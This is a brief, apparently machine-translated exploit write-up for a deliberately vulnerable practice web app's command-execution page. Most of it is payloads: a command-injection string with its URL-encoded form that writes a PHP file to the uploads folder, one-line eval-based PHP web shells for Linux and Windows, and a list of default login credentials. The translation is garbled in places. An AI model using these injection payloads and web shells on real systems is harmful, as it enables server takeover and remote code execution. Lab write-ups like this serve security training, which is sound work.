1Vulnerability address:
http://xxxx.vom/vulnerabilities/exec/source/low.php
2 Reasons for the vulnerability:
Command execution direct splicing
3 Vulnerability verification
Linux writes phpinfo(); to the hackable/uploads/ directory (you can also write it directly in the current directory)
plain text content:
1&echo “<?php phpinfo();?>” > …/…/…/hackable/uploads/4.
Exploit after php
encoding: ip=%31%26%65%63%68%6f%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f %28%29%3b%3f%3e%22%20%3e%20%2e%2e%2f%2e%2e%2f%2e%2e%2f%68%61%63%6b%61%62%6c %65%2f%75%70%6c%6f%61%64%73%2f%34%2e%70%68%70&Submit=Submit
Linux writes a sentence Trojan:
echo '<? php @eval($_POST["x"]); ?>' >shell.php
Windows writes a sentence to prevent the browser from writing escapes, so add ^:
echo ^<? php @eval($_POST['x']); ?^> >shell.php
4.Default password
It seems that you can log in directly with the default password.
gordonb/abc123
1337/charley
pablo/letmein
smithy/password